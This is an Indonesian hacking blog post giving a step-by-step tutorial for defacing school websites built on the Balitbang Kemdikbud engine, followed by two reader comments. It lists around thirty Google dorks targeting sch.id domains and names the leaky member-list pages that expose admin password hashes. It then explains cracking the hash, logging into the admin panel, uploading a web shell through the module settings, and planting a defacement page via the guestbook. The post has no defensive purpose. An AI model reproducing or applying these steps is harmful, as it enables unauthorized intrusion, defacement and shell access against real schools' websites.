Deface Poc Sql Balitbang

byAditya Prtma -
2


Hello bro balik lagi di blog gua,oke kali ini gua mau ngasih tutor sesuai judul
Bahan:

Tols balitbang Klik me

Hash pasword:Klik me

Dork:

> inurl:/html/index.php site:sch.id 

> inurl:/html/siswa site:sch.id 

> inurl:/html/guru site:sch.id 

> inurl:/html/alumni site:sch.id

> inurl:member/daftar.php intext:NAMAKOTA

> inurl:/sch.id Team balitbang intext:NAMAKOTA

> intext:”Kamfret Team”sch.id Team Balitbang

> inurl:/member/daftar.php

> inurl:”/html/index.php” intext:”Tim Balitbang”

> inurl:”/html/index.php” intitle:”Selamat Datang”

> inurl:”/member/” intext:”Tim Balitbang”

> inurl:”/html/siswa.php?”

> inurl:”/html/alumni.php?”

> inurl:”/html/guru.php?”

> inurl:/member/daftar.php intext:”namakota”

> inurl:/member/ site:sch.id “selamat datang di komunitas”

> inurl:/elearning/ “password” site:sch.id

> inurl:/member/index.php “Tim Balitbang Kemdikbud versi”

> inurl:/user/index.php “Tim Balitbang Kemdikbud versi”

> inurl:/member/user site:sch.id

> inurl:agenda site:sch.id “tim balitbang”

> inurl:artikel site:sch.id “tim balitbang”

> inurl:info site:sch.id “tim balitbang”

> inurl:buku site:sch.id “tim balitbang”

> inurl:”bukutamu” site:sch.id “tim balitbang”

> inurl:”opini” site:sch.id “tim balitbang”

> inurl:”link” site:sch.id “tim balitbang”

> inurl:”galeri” site:sch.id “tim balitbang”

> inurl:”album” site:sch.id “tim balitbang”

Website engine’s code is copyright © 2017 Tim Balitbang Kemdikbud versi

180707

Website engine’s code is copyright © 2017 Tim Balitbang Kemdikbud versi

190116

Website engine’s code is copyright © 2017 Tim Balitbang Kemdikbud versi

181128

Website engine’s code is copyright © 2017 Tim Balitbang Kemdikbud versi

Exploit:
users/listmemberall.php

member/listmemberall.php

Login admin nya biasa nya di 

Sitelu/admin
Sitelu/adminpanel
Oke pertama kalian dorking dulu,disini gua punya live target jika blank seperti di bawah kemungkinan vuln yah :D
Oke kita buka tols nya
Jika pas di tols seperti foto di bawah berarti web nya vuln

Kok pasword nya gitu bang?ya harus kalian hash dulu,itu buat hash nya udah saya sedia in,mari kita hash

Yap ini dia pasword nya,lalu kalian tinggal login aja:D
Mau upload shel?

KLIK YG BACAAN NYA SETTING ADMIN => TRUS KLIK POSISI MODUL =>KLIK TAMBAH POSISI MODUL => UPLOAD SHELL/MINI SHELL KALIAN => SIMPAN

TINGGAL AKSES DEH SHELL NYA
webtarget.sch.id/modul/namashell.php

Jika kalian nemu web blank tapi tidak vuln,bisa kalian jso lewat buku tamu :D
Sekain dari saya 
Tags:
Aditya Prtma

"Sekedar Anak Pemalas, Yang Memiliki Ketertarikan Dengan Dunia Hacking, Security & Teknologi"

2 Komentar

  1. Anonim12 Desember 2021 pukul 07.16

    menurut saya jika memberikan tutorial lebih baik berbentuk format "video" agar mudah dipahami oleh kami🙏

    BalasHapus
    Balasan
    1. Aditya Prtma12 Desember 2021 pukul 19.10

      Gapaham nya dimna pak?klo gapaham nanya aja,nanti ku bantu

      Hapus
Lebih baru Lebih lama